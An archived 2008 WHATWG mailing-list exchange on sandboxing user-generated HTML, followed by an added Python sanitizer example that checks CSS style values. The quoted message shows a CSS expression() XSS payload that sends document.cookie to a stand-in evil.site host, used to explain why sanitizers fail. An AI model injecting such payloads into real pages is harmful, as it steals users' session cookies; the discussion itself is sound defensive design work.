[whatwg] Sandboxing to accommodate user generated content.

Kristof Zelechovski giecrilj at stegny.2a.pl
Tue Jun 17 14:36:23 PDT 2008


This particular explanation is irrelevant to the topic because sandboxed
fragments can contain scripts, whether within CSS or not.  The idea of
sandboxing is to disable scripts, not to purge them.
Chris

-----Original Message-----
From: whatwg-bounces at lists.whatwg.org
[mailto:whatwg-bounces at lists.whatwg.org] On Behalf Of Frode Borli
Sent: Tuesday, June 17, 2008 8:34 PM
To: Kristof Zelechovski
Cc: whatwg at lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

> 1.  Please elaborate how an extension of CSS would require a sanitizer
> update.

In the year 1998: A sanitizer algorithm works perfectly for all
existing methods of adding scripts. It uses a white list, which allows
only certain tags and attributes. Among the allowed attributes are
colspan, rowspan and style, since the web developer wants users to be
able to build tables and style them properly.

In the year 1999 Internet Explorer 5.0 is introduced, and it
introduces a new invention: CSS expressions. Suddenly the formerly
secure web application is no longer secure. A user adds the following
code, and it passes the sanitizer easily:

<span style='color: blue; width: expression(document.write("<img
src=http://evil.site/"+document.cookie));'></span>

I am absolutely certain that there will be other, brilliant inventions
in the future which will break sanitizers - of course we can't know
which inventions today - but the sandboxing means that browser vendors
in the future can prevent the above scenario.
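As an added illustration of the point in the quoted message (example code, not from either poster): a whitelist that checks only tag and attribute names, as the 1998 sanitizer did, passes the quoted payload untouched, while checking the style value against an allowlist of CSS properties and a literal-only value grammar drops it. The tag, attribute and property allowlists are constructed for this example.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed allowlists: names alone, as in the 1998 sanitizer ...
ALLOWED_TAGS = {"p", "b", "i", "table", "tr", "td", "span"}
ALLOWED_ATTRS = {"colspan", "rowspan", "style"}
# ... plus a grammar for the *value* of style. Only keywords, lengths,
# percentages and hex colours pass; any parenthesis (expression(),
# url(), or a function not yet invented) fails the regex.
ALLOWED_CSS_PROPS = {"color", "width", "text-align", "font-weight"}
CSS_VALUE = re.compile(r"^[a-zA-Z0-9#%.\- ]+$")


def style_is_safe(style: str) -> bool:
    """Accept a style attribute only if every declaration is allowlisted."""
    for decl in filter(None, (d.strip() for d in style.split(";"))):
        if ":" not in decl:
            return False
        prop, value = (s.strip() for s in decl.split(":", 1))
        if prop.lower() not in ALLOWED_CSS_PROPS or not CSS_VALUE.match(value):
            return False
    return True


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__()
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # drop disallowed tags entirely (text inside is kept)
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS:
                continue
            if name == "style" and not style_is_safe(value or ""):
                continue  # the value, not just the name, is checked
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # re-escape text content


def sanitize(html: str) -> str:
    s = Sanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out)
```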
